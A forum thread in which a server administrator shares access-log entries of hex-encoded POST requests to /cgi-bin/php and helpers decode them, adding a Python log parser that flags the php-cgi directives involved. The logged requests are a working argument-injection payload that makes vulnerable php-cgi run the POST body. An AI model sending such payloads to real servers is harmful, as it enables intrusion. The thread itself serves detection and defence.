What is this about...

Thread starter: Deleted member 14254 (Guest)
here...

Code:
201.144.227.143 - - [13/Dec/2013:13:43:59 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 403 273
201.144.227.143 - - [13/Dec/2013:13:43:59 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 403 274
Code:
54.205.94.180 - - [13/Dec/2013:13:50:32 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 403 273
54.205.94.180 - - [13/Dec/2013:13:50:32 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 403 274

I've been getting this for several hours today... Every time addresses from the USA and Mexico. Good: f2b has blocked around 40 of them by now... But... fun is something else...
These numbers/percent signs... is that executable code, or how should one interpret it? So, looking for vulnerabilities in CGI scripts...
Considering that these are "POSTs" - SQL injection attempts?

I already wanted to ask last time but didn't get around to it...

Many thanks in advance for any help :)
 
huh, that was quick, thanks @DeaD_EyE :) I hope I'll still be laughing once I've read it :o

Ah! yep... Good to know. Very instructive, as I said, because I'd had such odd requests before, a good 2, maybe 3 months ago. Those percent signs and hex numbers as well...

I don't have Plesk or any other admin panels installed. I do everything (except phpmyadmin/postfixadmin) manually, and those are IP-restricted. Not visible from outside... *wipes sweat* :o :o
 
I was wondering earlier how I could convert such posts into readable text with Python. Stackoverflow simply knows everything :-D

Code:
>>> import urllib
>>> urllib.unquote('%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E')
'-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-n'

or without urllib:

Code:
s = '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E'

print s.replace('%', r'\x').decode('string-escape')
 
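An added example (my own Python 3 code, not posted in the thread) that does what the two Python 2 snippets above do by hand for the log lines in the opening post, and goes one step further: it parses the access-log line, splits the query string the way the CGI command-line rule does, and flags the -d directives that make php-cgi execute the POST body. The sample log lines, the names parse_query_argv, extract_directives, analyse and the RISKY_DIRECTIVES table are my own assumptions; the hex-encoded directives are the ones quoted above.

```python
import re
from urllib.parse import unquote
# Constructed sample lines (not copied from the thread): a probe in the shape quoted
# above, with a subset of its -d directives, and an ordinary request that must pass.
LOG_LINES = [
    '198.51.100.23 - - [13/Dec/2013:13:43:59 +0000] "POST /cgi-bin/php?'
    '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+'
    '%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70'
    '%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 403 273',
    '203.0.113.7 - - [13/Dec/2013:14:00:01 +0000] "GET /cgi-bin/php?q=hello%20world HTTP/1.1" 200 512',
]
# Apache common-log prefix: client, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')
# php.ini settings that, injected as -d options on a php-cgi command line, make PHP
# execute the POST body (php://input) with its safety nets switched off.
RISKY_DIRECTIVES = {
    "allow_url_include": "on",
    "auto_prepend_file": "php://input",
    "safe_mode": "off",
    "open_basedir": "none",
}

def parse_query_argv(target):
    """Return (path, argv) as the CGI rule builds it (RFC 3875 section 4.4): a query
    with no unencoded '=' is split on '+' and handed to the program as arguments."""
    path, sep, query = target.partition("?")
    if not sep or "=" in query:
        return path, []
    return path, [unquote(tok) for tok in query.split("+")]

def extract_directives(argv):
    """Collect the '-d key=value' pairs of an argv list into a dict."""
    directives = {}
    for flag, arg in zip(argv, argv[1:]):
        if flag == "-d":
            key, _, value = arg.partition("=")
            directives[key] = value
    return directives

def analyse(line):
    """Decode one access-log line; None if it is not in common-log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, argv = parse_query_argv(m["target"])
    directives = extract_directives(argv)
    hits = sorted(k for k, v in directives.items() if RISKY_DIRECTIVES.get(k) == v)
    return {"ip": m["ip"], "status": int(m["status"]), "path": path, "argv": argv, "hits": hits}
```

Running analyse over the real access log and alerting on a non-empty hits list gives a fail2ban-independent check that the 403s really were probes of this kind and not ordinary CGI traffic.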
Thanks again to you both :) Reading it right now... Hmmmh... that thing is quite something. Glad that Gentoo always rolls out new versions of Apache and PHP. Well, bugs can be anywhere, but it's reassuring to know...
 
Hey Neutrino,

I had some experiences to report on this, have a look here:

 
Hello faithful helpers :)

Thanks for pointing me to your experiences, @Rootserveradmin :)
I've read through them. How did you find the address of the IRC network this botnet operator was working from? In the payloads it downloaded? Or the IP he accessed from? Did you use BackTrack?

Quite a story... 20,000 hijacked systems... Nice computing power.
Extorting companies is surely in the repertoire, ready to hand for "quick cash"...

Are you also still getting these lines, imho? My server has blocked around 50 addresses today that sent this line (from the opening post) to my server...

Am I alone in this or is it the same for you?

(This isn't meant as an "alarm"... I just wanted to show you the "pattern" that is forming by now in the many iptables lines... ;) - Maybe some of the IPs look familiar to one or the other of you ;)

Code:
Chain fail2ban-apache-auth (1 references)
 pkts bytes target     prot opt in     out     source               destination         
63413   20M RETURN     all  --  any    any     anywhere             anywhere
 